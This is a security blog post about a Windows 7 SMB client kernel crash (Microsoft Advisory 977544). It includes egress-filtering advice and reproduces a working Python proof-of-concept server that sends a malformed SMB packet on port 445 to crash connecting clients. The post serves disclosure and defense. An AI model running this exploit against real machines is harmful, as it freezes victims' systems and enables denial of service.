Back on November 11th, 2009 we confirmed Laurent Gaffié’s remote exploit for Windows that causes a kernel crash. The operating system actually freezes creating a denial of service when, for example, a user is tricked into clicking on a link on a web page to a malicious SMB share request. The SMB client goes into an infinite loop when processing this malformed request according to Microsoft. The video below demonstrates this effect, having a user click a web site link and showing the crash.

“We are not aware of any active attacks using the exploit code that was made public for this vulnerability”
Jerry Bryant, Microsoft

Microsoft discusses this problem under Security Advisory 977544. The Security Response Center (MSRC) blog announced last Thursday that it would not correct this bug in this month’s patch release. The MSFT advisory initially discusses ingress rules for firewalls (rules for requests coming from the Internet) under mitigating factors, which would not be helpful in the case of a user making the request by clicking a link. It then catches this though under ‘Workarounds’ by stating to “block all SMB communications to and from the Internet to help prevent attacks”, which is a correct approach.

Windows 7 SMB Crash Video

People seem to be having a hard time visualizing this attack. The video below demonstrates first the crash itself, and then simulates a user clicking a link to a malformed SMB request.

Test Code

Here is the Python code used for testing, based on Gaffie’s original post:

import SocketServer as a
packet = "\x00\x00\x00\x9a"
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
class x(a.BaseRequestHandler):
  def handle(s):
      print "You connecting to me: %s"%(s.client_address[0])
      i = s.request.recv(1024)
      s.request.send(packet)
      s.request.close()
print "Waiting for the victim to connect to my open port 445"
launch = a.TCPServer(('', 445),x)
launch.serve_forever()

SMB

Server Message Block or SMB is an application-layer network protocol commonly used by Microsoft Windows to share files over the Local Area Network (LAN).

Finally

Many ISP’s will block requests associated with the SMB protocol for home broadband Internet connections in reaction to past remote threats that use the SMB port. For businesses, unless good egress rules are in place (many times they are not), this attack is a realistic threat. Good egress rules will block it, and should already be in place for other potential threats if not already there. This provides a good excuse to check.

Microsoft has yet to release a scheduled fix date for this. While not as problematic as say an exploit that allows for code injection, a remotely exploitable DOS attack that remains announced and in zero day status for more than two months likely does merit attention in February’s patch Tuesday release.

Related Posts:

• IEPeers – A New Internet Explorer Zero Day Vulnerability
• Press F1 for Help, pwned.
• The “Aurora” IE Exploit Used Against Google in Action
• Juniper Kernel Crash – scapy Code
• JUNOS (Juniper) Kernel Crash Video